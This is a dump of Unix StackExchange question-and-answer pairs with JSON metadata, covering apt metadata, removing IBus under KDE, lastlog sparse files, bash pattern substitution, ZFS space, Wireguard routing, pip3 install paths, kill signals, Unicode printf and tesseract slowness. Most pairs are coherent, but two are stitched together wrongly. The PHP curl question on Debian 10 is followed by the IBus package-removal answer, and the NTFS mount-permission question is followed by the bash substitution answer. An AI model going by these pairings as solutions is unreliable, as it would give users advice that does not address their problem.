dependencies, and so on. When the repository gets updated, the metadata will get updated to, but your local copy that was downloaded earlier won't . This is natural, you don't want your PC constantly checking with the server if your copy of the metadata is outdated. Now next time you need to install a package, you could face problems, because your system has outdated metadata, so it can't figure out the correct thing to do. Then you need to run apt-get update to update this metadata. When you uncomment the source line, nothing has happened yet, as I said. The next time you run apt-get update , it will download metadata from that source too. And the next time after that when you install, upgrade or remove packages, apt will consider the additional metadata when figuring out things. That's how apt works. Yum, on the other hand, checks for updated metadata and downloads it whenever you add, remove or upgrade packages. Both methods have their pros and cons. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529786",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/321333/"
]
} |
529,822 | Please, how to get rid of IBus service/IBus panel when running KDE? This Gnome(?) keyboard layout manager (?) can get into conflict with the layout set natively in KDE Settings. I need to switch often between CZ and UK keyboard and IBus makes it impossible. The severity of this issue can range from a visual irritation of having two keyboard layout indicators in the tray area, but it gets much more serious when both systems set conflicting layouts; like when in KDE I set Czech keyboard but IBus somewhat keeps English UK layout: Can you guess which layout - EN (IBus) or CZ (KDE) - is actually active? The wrong one, of course, IBus seems to always override KDE :( If I quit IBus panel now, it would make it even worse because it's only the tray applet, the GUI bit, what disappears but IBus service is still active. I still wouldn't have my CZ keyboard and absolutely no way to change it. Very annoying variant of this problem is when user have only single layout setting in KDE, which is by default not displayed in the tray area; but IBus setting always is, even as single layout. User then have a very angrying sensation of whatever he sets in KDE Settings is completely ignored, blaming probably KDE, unaware that the layout indicator belongs to a different system and that is overriding KDE settings. I once managed to kill all keyboard input completely when playing with KDE Settings and IBus properties at the same time. Really awful UX. IBus seems to be part of the Gnome stack. So why it gets activated in KDE?I suspect it appeared there only after I had installed also some Gnome/Gtk applications, like Gimp, GDM, etc. OS: openSuse 15.0 Linux. This issue was present in previous versions too. UPDATE: I also faced issue with US keyboard suddenly appearing as a third option. But twat would be for yet another bug report. UPDATE 2: OK, I uninstalled them. Surprisingly it is possible to uninstall just ibus, not the whole Gnome. My GDM still works. BUT - I now face another issue, I cannot switch keyboard layouts anymore, despite setting everything in System Settings and having 2 keyboard indicators in tray, only UK keyboard now works for me. I suspect IBus screwed something in KDE generally. Ehhh, I sometimes feel that working with Linux means you will spend half of the time solving usability issues and writing bug reports :( | I had a similar issue, though possibly slightly different as I don't intend to keep using Gnome. Removing ibus-gtk , ibus-gtk3 , ibus-gtk3-32bit , ibus-lang , and ibus (all ibus -related packages on my system; yours may be different) seems to have worked with no ill effects after a reboot. You can remove them by running zypper rm -u ibus* - be sure to check the list for anything essential that you do not want removed. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529822",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/293839/"
]
} |
529,823 | I need php7.2-curl . But on Debian 10 apt says that it cannot be installed due to a dependency with libcurl3 . But libcurl3 cannot be installed (it gives me no reason). Must I rollback to Debian 9.9? I already tried to switch to PHP 7.3, but even php7.3-curl depends on libcurl3 ! | I had a similar issue, though possibly slightly different as I don't intend to keep using Gnome. Removing ibus-gtk , ibus-gtk3 , ibus-gtk3-32bit , ibus-lang , and ibus (all ibus -related packages on my system; yours may be different) seems to have worked with no ill effects after a reboot. You can remove them by running zypper rm -u ibus* - be sure to check the list for anything essential that you do not want removed. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529823",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/167205/"
]
} |
529,827 | I have read some question, that ask advice how to rsync sparse files efficiently mentioning the files /var/log/lastlog and /var/log/faillog . Indeed I myself have stumpled over those files being an "issue" as their being backup via rsync turns them to become "unsparse". What I hence wonder is, what is the need/backgrounding motivation to have those files as sparse, huge files (in my case it was 1.1TB)? Also in relationship to this a follow up: Since I was assuming them to be logfiles I do not care about excesively I truncated those files, did I corrupt anything with truncating those files ? | What I hence wonder is, what is the need/backgrounding motivation to have those files as sparse, huge files (in my case it was 1.1TB)? This is how it's supposed to be. /var/log/lastlog is not a log file like /var/log/syslog , and its name should be read as "last logins list" rather than "last logfile". It's maintained by the pam_lastlog(8) module, and it's basically an array like this: struct lastlog { time_t ll_time; // 4 char ll_line[UT_LINESIZE]; // 32 char ll_host[UT_HOSTSIZE]; // 256} entry[UINT_MAX]; Sizes of the fields on a typical x86-64 machine are in comments; an entry should be 4 + 32 + 256 = 292 bytes. Every time a program using the pam_lastlog(8) pam module is logging a user in, it will seek to uid * sizeof(struct lastlog) and overwrite the entry corresponding to that user. did I corrupt anything with truncating those files ? You did corrupt the output of the lastlog(1) command, which nobody is using anyway ;-) | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/529827",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/24394/"
]
} |
529,937 | I regularly use the expression line=${line//[$'\r\n']} . But what does [$'\r\n'] mean? I know it removes the '\r\n' characters but how does it do this? Does it remove the instances of both characters only, or does it also find matches of just one character? I do not understand the usage of this syntax. If you can, please, give me a link to the manual. I cannot find the answer on this question. | From the Bash manual : ${ parameter / pattern / string } The pattern is expanded to produce a pattern just as in filename expansion. Parameter is expanded and the longest match of pattern against its value is replaced with string. The match is performed according to the rules described below (see Pattern Matching ). If pattern begins with / , all matches of pattern are replaced with string . ... If string is null, matches of pattern are deleted and the / following pattern may be omitted. You have ${line//[$'\r\n']} , where: the parameter is line , the pattern is /[$'\r\n'] (note: begins with / , so all matches of pattern are replaced), and the string is null, so the / after pattern is omitted, and matches are deleted. Following the rules for Pattern Matching : […] Matches any one of the enclosed characters. $'...' tells bash to interpret certain escape sequences (here, \r for carriage return and \n for line feed) and replace them with actual characters represented by the escape sequences. So this substitution matches all instances of either carriage return (CR, \r ) or line feed (LF, \n ), and deletes them. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529937",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/352872/"
]
} |
529,958 | I am using Arch Linux, and every time I boot my laptop as a user, the hard disk folders permissions is set to root only, so I can't open them as a user, I used the following command to change the permission sudo chmod -R 775 /mnt where /mnt is the folder that contains my hard disk. When I reboot my laptop, every thing resets and I had to use the same command to access my hard disk again, so how to save the permissions? The output of /etc/fstab # Static information about the filesystems.# See fstab(5) for details.# <file system> <dir> <type> <options> <dump> <pass># /dev/sda6UUID=e0888535-4d8b-4b89-9a7e-4a85208fe129 / ext4 rw,relatime 0 1 My hard disk is a windows disk, I am dual booting with windows 10. The output of df: Filesystem 1K-blocks Used Available Use% Mounted ondev 2973860 0 2973860 0% /devrun 2982588 716 2981872 1% /run/dev/sda6 30313412 4987780 23762752 18% /tmpfs 2982588 101116 2881472 4% /dev/shmtmpfs 2982588 0 2982588 0% /sys/fs/cgrouptmpfs 2982588 220 2982368 1% /tmptmpfs 596516 24 596492 1% /run/user/1001/dev/sda4 354528216 350712252 3815964 99% /mnt The output of mount: proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)sys on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)dev on /dev type devtmpfs (rw,nosuid,relatime,size=2973860k,nr_inodes=743465,mode=755)run on /run type tmpfs (rw,nosuid,nodev,relatime,mode=755)/dev/sda6 on / type ext4 (rw,relatime)securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)cgroup2 on /sys/fs/cgroup/unified type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate)cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)bpf on /sys/fs/bpf type bpf (rw,nosuid,nodev,noexec,relatime,mode=700)cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)tmpfs on /tmp type tmpfs (rw,nosuid,nodev)debugfs on /sys/kernel/debug type debugfs (rw,nosuid,nodev,noexec,relatime)systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=13513)mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime,pagesize=2M)configfs on /sys/kernel/config type configfs (rw,nosuid,nodev,noexec,relatime)tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=596516k,mode=700,uid=1001,gid=1001)/dev/sda4 on /mnt type ntfs (rw,relatime,uid=0,gid=0,fmask=0177,dmask=077,nls=utf8,errors=continue,mft_zone_multiplier=1) | From the Bash manual : ${ parameter / pattern / string } The pattern is expanded to produce a pattern just as in filename expansion. Parameter is expanded and the longest match of pattern against its value is replaced with string. The match is performed according to the rules described below (see Pattern Matching ). If pattern begins with / , all matches of pattern are replaced with string . ... If string is null, matches of pattern are deleted and the / following pattern may be omitted. You have ${line//[$'\r\n']} , where: the parameter is line , the pattern is /[$'\r\n'] (note: begins with / , so all matches of pattern are replaced), and the string is null, so the / after pattern is omitted, and matches are deleted. Following the rules for Pattern Matching : […] Matches any one of the enclosed characters. $'...' tells bash to interpret certain escape sequences (here, \r for carriage return and \n for line feed) and replace them with actual characters represented by the escape sequences. So this substitution matches all instances of either carriage return (CR, \r ) or line feed (LF, \n ), and deletes them. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/529958",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362187/"
]
} |
530,012 | When using ZFS on FreeBSD , how can we see how much space is used and how much is available in storage drives (hard disk, SSD, etc.)? For example, spinning up a virtual machine instance of FreeBSD on DigitalOcean comes with a certain amount of storage. How can I verify the size of that virtual drive? | zfs list Use the list option on the zfs command built into FreeBSD. zfs list Example: $ zfs listNAME USED AVAIL REFER MOUNTPOINTzroot 4.41G 17.4G 88K nonezroot/ROOT 3.49G 17.4G 88K nonezroot/ROOT/default 3.49G 17.4G 3.15G legacyzroot/tmp 112K 17.4G 112K /tmpzroot/usr 947M 17.4G 88K /usrzroot/usr/home 184K 17.4G 128K /usr/homezroot/usr/ports 947M 17.4G 947M /usr/portszroot/usr/src 88K 17.4G 88K /usr/srczroot/var 792K 17.4G 88K /varzroot/var/audit 88K 17.4G 88K /var/auditzroot/var/crash 88K 17.4G 88K /var/crashzroot/var/log 348K 17.4G 348K /var/logzroot/var/mail 92K 17.4G 92K /var/mailzroot/var/tmp 88K 17.4G 88K /var/tmp$ Learn more on the zfs man page . The zfs command has many options for controlling the rich features of the ZFS file system. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56752/"
]
} |
530,191 | Can someone explain to me why I don't see the output of "date" from the below command? For N number for STDIN inputs, it's printing only for last (N-1) commands? [root@RAJ-RHEL6 raj]# cat < <(date) <(hostname) <(uptime) <(cat /etc/resolv.conf)RAJ-RHEL6.5 02:22:59 up 2:36, 1 user, load average: 0.00, 0.00, 0.00nameserver 10.207.26.248[root@RAJ-RHEL6 raj]# | You may only redirect the standard input stream from one place. You can't expect to be able to redirect it from several files or process substitutions in a single command. The command cat < <(date) <(hostname) <(uptime) <(cat /etc/resolv.conf) is the same as cat <(hostname) <(uptime) <(cat /etc/resolv.conf) < <(date) i.e., you are giving cat three input files, and then you redirect the output of date into its standard input. The cat utility will not use its standard input stream if it's given files to work with, but you can get it to do so by using the special - filename: cat - <(hostname) <(uptime) <(cat /etc/resolv.conf) < <(date) Note also that the last process substitution is useless and the command is better written written as cat - <(hostname) <(uptime) /etc/resolv.conf < <(date) or, without that redirection of the output of date , as cat <(date) <(hostname) <(uptime) /etc/resolv.conf or, with a single command substitution, cat <( date; hostname; uptime; cat /etc/resolv.conf ) or, without process substitutions, date; hostname; uptime; cat /etc/resolv.conf Related: How is this command legal ? "> file1 < file2 cat" | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530191",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362360/"
]
} |
530,203 | Everytime I run terminal I get this error message ".bashrc syntax error: unexpected end of file" So I started commenting parts of it to know the issue and I guess it was in the below if condition. I wonder how I can edit it to work? if ("1" == "$?LD_LIBRARY_PATH") then if ("$LD_LIBRARY_PATH" !~ */usr/local/iscir/lib*) then export LD_LIBRARY_PATH /usr/local/iscir/lib:$LD_LIBRARY_PATH endifelse export LD_LIBRARY_PATH /usr/local/iscir/libendif I tried this but didn't work as if ["1" == "$?LD_LIBRARY_PATH"]; then if ["$LD_LIBRARY_PATH" !~ */usr/local/iscir/lib*]; then export LD_LIBRARY_PATH /usr/local/iscir/lib:$LD_LIBRARY_PATH fielse export LD_LIBRARY_PATH /usr/local/iscir/libfi | There's no endif in bash. An if statement is ended by a fi . Also, when using the [ ] test construct, you need a space around the [ . The =~ regex match operator, requires bash's special [[ ]] instead of the POSIX [ ] , and to negate the match, you negate the whole test ( [[ ! foo ~ bar ]] ), you can't use !~ . Also, it requires a regular expression, not a shell glob. So * doesn't mean anything by itself, you need .* for "any character". Then, the format for setting and exporting a variable is export foo=bar and also, you have a stray ? between the $ and LD_LIBRARY_PATH . So try this: if [ "1" == "$LD_LIBRARY_PATH" ]; then if [[ ! "$LD_LIBRARY_PATH" =~ .*/usr/local/iscir/lib.* ]]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib:$LD_LIBRARY_PATH" fielse export LD_LIBRARY_PATH="/usr/local/iscir/lib"fi That should work, but the whole thing doesn't make sense. When will LD_LIBRARY_PATH be 1 ? I don't really see how this would ever be executed. If all you want to do is add /usr/local/iscir/lib to LD_LIBRARY_PATH if it isn't there already, you just need this: if [ -z "$LD_LIBRARY_PATH" ]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib"elif [[ ! "$LD_LIBRARY_PATH" == */usr/local/iscir/lib* ]]; then export LD_LIBRARY_PATH="/usr/local/iscir/lib:$LD_LIBRARY_PATH"fi | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530203",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85865/"
]
} |
530,350 | I just came across a bash script. What does [[:space:]] mean in a bash script?Why the double colon? | It is not only for Bash, It is part of POSIX notation. What is POSIX? POSIX or "Portable Operating System Interface for uniX" is a collection of standards that define some of the functionality that a (UNIX) operating system should support. One of these standards defines two flavors of regular expressions. POSIX Bracket Expressions POSIX bracket expressions are a special kind of character classes. POSIX bracket expressions match one character out of a set of characters, just like regular character classes. Standard POSIX [[:alnum:]] Alphanumeric characters[[:alpha:]] Alphabetic characters[[:blank:]] Space and tab[[:cntrl:]] Control characters[[:digit:]] Digits[[:graph:]] Visible characters (anything except spaces and control characters)[[:lower:]] Lowercase letters[[:print:]] Visible characters and spaces (anything except control characters)[[:punct:]] Punctuation (and symbols).[[:space:]] All whitespace characters, including line breaks[[:upper:]] Uppercase letters[[:xdigit:]] Hexadecimal digits None Standards [[:ascii:]] ASCII characters[[:word:]] Word characters (letters, numbers and underscores) legacy syntax (can someone find reference to these?) [[:<:]] Start of Word [[:>:]] End of Word You can find more info here: wiki | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/530350",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362485/"
]
} |
530,413 | If the package command-not-found is installed and a user tries to run a command which is not present on the system, a suggestion is printed with the name of the package which provides the executable. Is there a command with the same functionality but which takes the name of an executable as an argument? Edit: I have read How to find out which (not installed) Debian package a file belongs to? but none of the suggestions present a command which gives an unambiguous result like command-not-found . | You can use command-not-found itself: command-not-found --ignore-installed ls will tell you which package contains the ls command. ( --ignore-installed avoids taking into account installed packages, and in particular ensures that the command isn’t run immediately if it’s already installed.) Alternatively, you can use apt-file : apt-file search bin/ls will list all packages containing a file whose path contains “bin/ls”. You can filter this to match only ls : apt-file search bin/ls | grep bin/ls$ | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/530413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/36718/"
]
} |
530,537 | I want to append NoDisplay=true to a .desktop file, but only if the entry doesn't exist. I do this the following way: grep -q 'NoDisplay=true' '/usr/share/applications/yelp.desktop' || bash -c 'echo "NoDisplay=true" >> /usr/share/applications/yelp.desktop' I was wondering if there is a shorther oneliner for the same operation? I use this command in a bash script and had to use command "bash -c". | If you have GNU sed , it's fairly simple: sed -zi '/NoDisplay=true/!s/$/\nNoDisplay=true/' file Option -z treats the whole line at once in the pattern space (not recommended for huge files). If the setting is not ( ! ) found, append it at the end with an embedded newline. Note: -i , -z and \n in the replacement string are not standard, so this is not portable. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530537",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/250156/"
]
} |
530,575 | I've tried to search for a solution, but all I found was how to pin processes to CPU using taskset or sched_setaffinity. But it looks like this won't give the process exclusive access to the CPU, i.e., scheduler may assign some other process on this CPU. Is there any way or command by which we can ensure that the CPU is dedicated to the process? With taskset we can make sure a particular process runs only on particular CPU, but I want it to be other way too, where CPU is binded to that process. I've found questions like How to allocate a process specific amount of CPU power? and How to limit a process to one CPU core in Linux? but they got marked as duplicate of How can I set the processor affinity of a process on Linux? which is not what I want. | You Need to exclude one CPU from the Overall scheduling, afterwards you can assign the process to it via taskset as you already found out. To exclude a CPU, add the boot Parameter isolcpus=N The Number (N) is 0-based. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530575",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/312593/"
]
} |
530,602 | I'm testing Debian 10 in a VM to check if i can use it for my stream servers (headless minimal netinstall). Why does pip3 install, e.g supervisor, in ~/.local ? I did read the release notes but couldn't find anything about the .local folder. As far as I understand, I will run in to trouble with PATH , and there are a lot of other reasons to install it to /usr/local rather then ~/.local . How can I avoid this, or is this the way it meant to be in Debian? | The following warning in packaging.python.org may answer you questions Warning Recent Debian/Ubuntu versions have modified pip to use the “ User Scheme ” by default, which is a significant behavior change that can be surprising to some users. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530602",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/346243/"
]
} |
530,682 | I've realised recently that the kill utility can send any signal I want, so when I need to SIGKILL a process (when it's hanging or something), I send a SIGSEGV instead for a bit of a laugh ( kill -11 instead of kill -9 .) However, I don't know if this is bad practice. So, is kill -11 more dangerous than kill -9 ? If so, how? | The SIGSEGV signal is sent by the kernel to a process that has made an invalid virtual memory reference (segmentation fault). One way sending a SIGSEGV could be more "dangerous" is if you kill a process from a filesystem that is low on space. The default action when a process receives a SIGSEGV is to dump core to a file then terminate. The core file could be quite large, depending on the process, and could fill up the filesystem. As @Janka has already mentioned, you can write code to tell your program how you want it to handle a SIGSEGV signal. You can't trap a SIGKILL or a SIGSTOP . I would suggest using a SIGKILL or a SIGSTOP when you only want to terminate a process. Using a SIGSEGV usually won't have bad repercussions, but it's possible the process you want to terminate could handle a SIGSEGV in a way you don't expect. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530682",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/332140/"
]
} |
530,788 | I'm running Arch Linux with simple terminal using the Adobe Source Code Pro font. My locale is correctly set to LANG=en_US.UTF-8 . I want to print Unicode characters representing playing cards to my terminal. I'm using Wikipedia for reference . The Unicode characters for card suits work fine. For example, issuing $ printf "\u2660" prints a black heart to the screen. However, I'm having trouble with specific playing cards. Issuing $ printf "\u1F0A1" prints the symbol Ἂ1 instead of the ace of spades . What's going wrong? This problem persists across several terminals (urxvt, xterm, termite) and every font I've tried (DejaVu, Inconsolata). | help printf defers to printf(1) for the escape sequences interpreted, and the docs for GNU printf says: printf interprets two character syntaxes introduced in ISO C 99: \u for 16-bit Unicode (ISO/IEC 10646) characters, specified as four hexadecimal digits hhhh , and \U for 32-bit Unicode characters, specified as eight hexadecimal digits hhhhhhhh . printf outputs the Unicode characters according to the LC_CTYPE locale. Unicode characters in the ranges U+0000…U+009F, U+D800…U+DFFF cannot be specified by this syntax, except for U+0024 ($), U+0040 (@), and U+0060 (`). Something similar is specified in the Bash manual for ANSI C Quoting and echo : \uHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal value HHHH (one to four hex digits) \UHHHHHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal value HHHHHHHH (one to eight hex digits) In short: \u is not for 5 hex digits. It's \U : # printf "\u2660 \u1F0A1 \U1F0A1\n"♠ Ἂ1 | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/530788",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/92703/"
]
} |
530,790 | I am having CentOS 7.6 version, and I installed test Wireguard VPN server. The whole installation and configuration is pretty easy, at least according to documentation, so what I did, I installed wireguard-tools, wireguard-dkms and linux-headers next step was, that I generated private and public key of the server, and wrote configuration of the server as: [Interface]Address = 10.7.0.1/24ListenPort = 34777PrivateKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.2/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.3/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.4/32[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.5/32 from the server side I opened port 34777 udp on a firewall, and set sysctl -w net.ipv4.ip_forward (to enable forwarding) as this server should suppose to forward traffic from client to other servers in the subnet of the VPN server. Now lets imagine that public IP of this server is 11.11.11.11/23 On the client side, configuration looks like this: [Interface]Address = 10.7.0.4/24PrivateKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=[Peer]PublicKey = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=AllowedIPs = 10.7.0.1/32,11.11.11.0/23 (for having route to 11.11.11.0/23 subnet) or 0.0.0.0/0Endpoint = 11.11.11.11:34777 now 0.0.0.0/0 means that I will forward all traffic to my VPN (its not mandatory), it can be a split tunnel.... what I don't understand, when I connect, I can ping interface of the server 10.7.0.1, but I cannot ping anything from the network 11.11.11.0/23.Since network 11.11.11.0/23 is public, there is no NAT.Also to mention, on the CentOS I use firewalld instead of iptables. How and why cannot I see the internal network behind tunneled interface? picture how setup looks like: P.S. On the picture, between host A and Wireguard server, there is another linux router (a main router), so please keep in mind that. | After so many try and fail and brainstorming with wireguard IRC chanel guys, apparently I forgot to add a static route for 10.7.0.0/24 for each server behind wireguard. Ping goes to the server, but does not return as server does not know where to send that echo-reply: ip route add 10.7.0.0/24 via 11.11.11.11 dev eth0 (main device for communication) For me, problem solved ;-) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530790",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/102001/"
]
} |
530,794 | My laptop is an Acer predator helios 300 with intel i7-7700hq and an NVIDIA GTX 1050ti. It had a 128GB NVME SSD and 1TB hard disk. I had dual boot on it with fedora 29 installed on the SSD and Mint Tessa installed on the Hard Disk. I deleted all the fedora partitions including the EFI partition from within mint using GParted. After that even Mint did not boot up. I tried to install Deepin OS 15.10 on the SSD and freed all the space on the HDD in the process. While the installation completed without an issue, it just freezes completely whenever I hit shutdown or restart. The exact same thing happens with Manjaro Deepin 18.0.2 as well as Elementary OS 5.0 Juno. I tried setting nouveau.modeset=0 , acpi=off , acpi=noirq in /etc/default/grub and similar solutions people suggesting online. None of them worked. I then replaced the HDD with a Samsung 860 Evo 250 GB SATA SSD and tried to install Ubuntu 18.04 on it. Exact same thing as the previous three. Clean installation but freezes on reboot/shutdown. 1) I saw people claiming this to be a display driver issue. I am not sure but this seems unlikely as I had faced issues with the nouveau drivers earlier and those mostly led to blank screens on startup. I may be wrong here though. 2) This may be an issue with the UEFI bootloader as on rare occasions when the system does not freeze on pressing shut down immediately, it stops at Problem loading UEFI:db X.509 certificate (-65) 3) I tried some of the UEFI related options like enabling and disabling secure boot. To no avail. Any help is very very welcome. I am not able to do any work as I don't want to hard shut down my laptop again and again. | I was fighting this issue for 3 days, tried all of the above options but none of them helped me. But I solved it! So, in my case the issue was because of UEFI boot (probably because laptop is very old: lenovo ideapad z570 and UEFI implementation is buggy). SOLUTION: I just added noefi into the kernel options and my laptop started shutting down in a normal way. sudo vim /etc/default/grub GRUB_CMDLINE_LINUX_DEFAULT="splash quiet noefi" Update grub (for ubuntu : sudo update-grub ) PS: It works on any kernel ( 4.19 or 5.2 ). Tested it on nvidia-390xx | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530794",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/362895/"
]
} |
530,818 | Problem pytesseract.image_to_string() takes too much time when I run the script through supervisordd, but executes almost instantaneously when run directly in shell (on the same server and simultaneously with supervisor scripts). Apart from taking too much time, the processes are also showing high CPU usage. Time taken by pytesseract.image_to_string() when run via Supervisord: ~30s Time taken by pytesseract.image_to_string() when run via Bash: 0.1s This problem only occurs, if there are a lot of processes, executing pytesseract.image_to_string() , being run via supervisord (around 22 instances). If I reduce the number of instances (to around 10), the scripts executed via supervisord also run smoothly. System Information OS: Ubuntu 18.04.2 LTS (bionic) Supervisord: Version 3.3.1 Tesseract: Version 4.0.0-beta.1 Python: Version 3.6 PyTesseract: Version 0.2.5 ulimit -a core file size (blocks, -c) 0data seg size (kbytes, -d) unlimitedscheduling priority (-e) 0file size (blocks, -f) unlimitedpending signals (-i) 127357max locked memory (kbytes, -l) 16384max memory size (kbytes, -m) unlimitedopen files (-n) 8096pipe size (512 bytes, -p) 8POSIX message queues (bytes, -q) 819200real-time priority (-r) 0stack size (kbytes, -s) 8192cpu time (seconds, -t) unlimitedmax user processes (-u) 127357virtual memory (kbytes, -v) unlimitedfile locks (-x) unlimited Let me know if you need any more information. Edit 1 (or I know what's NOT the source of this problem) I am fairly certain that it is not an issue with Supervisord. When I run one instance from an ssh shell, the function ( pytesseract.image_to_string() ) is executed smoothly (i.e takes only 0.1s), while there are 10 instances being run via Supervisord. When I start another instance from a new ssh shell, both the instances (ones started from ssh) run smoothly most of the time. When I start yet another instance from a new ssh shell, all the three instances start choking, taking around 10s to execute the function. This time keeps on increasing as I add more instances via shell. So the problem can be replicated even with a shell. More Information I ran the program with strace -T -f but I could not figure out what exactly is causing the spike in time. For a function call that takes 1s Top 10 system calls sorted by time taken1.504530 [pid 29921] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 301660.503915 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503472 [pid 29932] <... select resumed> ) = 0 (Timeout)0.500524 [pid 29933] <... select resumed> ) = 0 (Timeout)0.500515 [pid 29933] <... select resumed> ) = 0 (Timeout)0.500514 [pid 29932] <... select resumed> ) = 0 (Timeout)0.500512 [pid 29933] <... select resumed> ) = 0 (Timeout)0.069869 [pid 30169] <... futex resumed> ) = ? ERESTARTSYS (To be restarted if SA_RESTART is set)0.035989 [pid 30167] <... futex resumed> ) = 00.016002 [pid 30168] <... futex resumed> ) = 0 For a function call that takes 9s Top 10 system calls sorted by time taken9.795787 [pid 29921] <... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 301060.515960 [pid 29933] <... select resumed> ) = 0 (Timeout)0.511955 [pid 29933] <... select resumed> ) = 0 (Timeout)0.507979 [pid 29932] <... select resumed> ) = 0 (Timeout)0.507968 [pid 29932] <... select resumed> ) = 0 (Timeout)0.505257 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503988 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503978 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503975 [pid 29932] <... select resumed> ) = 0 (Timeout)0.503974 [pid 29932] <... select resumed> ) = 0 (Timeout) | Disabling multiprocessing in tesseract fixed the issue. It can be done by setting OMP_THREAD_LIMIT=1 in the environment. See https://github.com/tesseract-ocr/tesseract/issues/898#issuecomment-315202167 | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/530818",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/125892/"
]
} |
